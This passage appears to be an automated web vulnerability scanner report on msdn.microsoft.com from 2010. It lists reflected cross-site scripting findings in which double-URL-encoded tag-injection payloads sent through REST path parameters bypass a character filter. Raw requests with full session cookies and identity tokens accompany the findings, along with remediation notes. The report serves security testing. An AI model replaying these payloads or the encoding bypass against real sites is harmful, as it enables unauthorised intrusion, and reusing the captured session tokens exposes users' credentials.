17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:54 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usce0fb"><a>210aa7e2390/library/ee663300(VS.85" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4583f%2522%253e%253ca%253e3ce016e5681 was submitted in the REST URL parameter 2. This input was echoed as 4583f"><a>3ce016e5681 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library4583f%2522%253e%253ca%253e3ce016e5681/ee663300(VS.85 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:16:03 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library4583f"><a>3ce016e5681/ee663300(VS.85" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17e66%2522%253e%253ca%253e75a4d87b1f0 was submitted in the REST URL parameter 3. This input was echoed as 17e66"><a>75a4d87b1f0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ee663300(VS.8517e66%2522%253e%253ca%253e75a4d87b1f0 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:16:11 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee663300(VS.8517e66"><a>75a4d87b1f0" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f03f2%2522%253e%253ca%253e020d19f1e98 was submitted in the REST URL parameter 1. This input was echoed as f03f2"><a>020d19f1e98 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usf03f2%2522%253e%253ca%253e020d19f1e98/library/ee663300(VS.85).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9213 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:43 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usf03f2"><a>020d19f1e98/library/ee663300(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d063%2522%253e%253ca%253e98b4bfeb5d1 was submitted in the REST URL parameter 2. This input was echoed as 9d063"><a>98b4bfeb5d1 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9d063%2522%253e%253ca%253e98b4bfeb5d1/ee663300(VS.85).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9213 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:57 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9d063"><a>98b4bfeb5d1/ee663300(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa396%2522%253e%253ca%253eddc59ddb169 was submitted in the REST URL parameter 3. This input was echoed as fa396"><a>ddc59ddb169 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ee663300(VS.85).aspxfa396%2522%253e%253ca%253eddc59ddb169 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9223 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:11 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee663300(VS.85).aspxfa396"><a>ddc59ddb169" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66b35%2522%253e%253ca%253e93ed8ded15d was submitted in the REST URL parameter 1. This input was echoed as 66b35"><a>93ed8ded15d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
